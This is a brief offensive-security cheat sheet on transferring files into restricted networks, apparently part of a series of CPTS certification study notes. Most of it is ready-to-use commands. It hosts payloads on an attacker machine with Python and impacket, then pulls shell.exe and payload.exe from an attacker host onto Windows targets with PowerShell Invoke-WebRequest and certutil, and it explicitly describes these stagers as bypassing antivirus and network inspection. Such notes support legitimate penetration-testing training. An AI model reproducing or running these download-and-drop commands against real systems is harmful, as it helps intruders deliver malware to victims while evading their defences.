Offensive File Transfers Across Restricted Networks
Reliable stagers and file transfer techniques for Windows and Linux hosts with egress restrictions.
pythonpowershellcertutilimpacketcurl
Dropping binaries on target hosts requires resilient stagers that bypass antivirus and network inspection.
1. Hosting Files on Attacker
python3 -m http.server 8000
sudo impacket-smbserver share $(pwd) -smb2support
2. Windows Downloads
- PowerShell WebClient:
powershell -c "Invoke-WebRequest -Uri http://{LHOST}:8000/shell.exe -OutFile C:\Windows\Temp\shell.exe"
- Certutil (Built-in LOLBAS):
certutil -urlcache -split -f http://{LHOST}:8000/payload.exe C:\Temp\payload.exe
3. Base64 Pipe (Zero Network Transfers)
- Encode on Attacker:
cat binary.exe | base64 -w 0
- Decode in PowerShell:
[IO.File]::WriteAllBytes("C:\Temp\tool.exe", [Convert]::FromBase64String("BASE64_STRING"))
Downloaded tools enable privilege escalation in 04. Linux Privilege Escalation Master Guide and 05. Windows Local Privilege Escalation & LOLBAS.
More CPTS notes
- 01. Network Discovery & Port Scanning Guide
- 02. Web Content Discovery & Directory Fuzzing
- 03. Web Application Exploitation & Injection
- 04. Linux Privilege Escalation Master Guide
- 05. Windows Local Privilege Escalation & LOLBAS
- 06. Active Directory Attack Paths & Domain Enumeration
- 07. Kerberos Exploitation: AS-REP & Kerberoasting
- 08. Active Directory Certificate Services (AD CS) Abuse
- 09. Pivoting, Tunnels & Lateral Movement
- 10. Password Cracking & Hash Identification
- 12. Interactive TTY Stabilization & Terminal Spawning
Keep these notes in your own private vault. Open CPTS notes in ZeroBox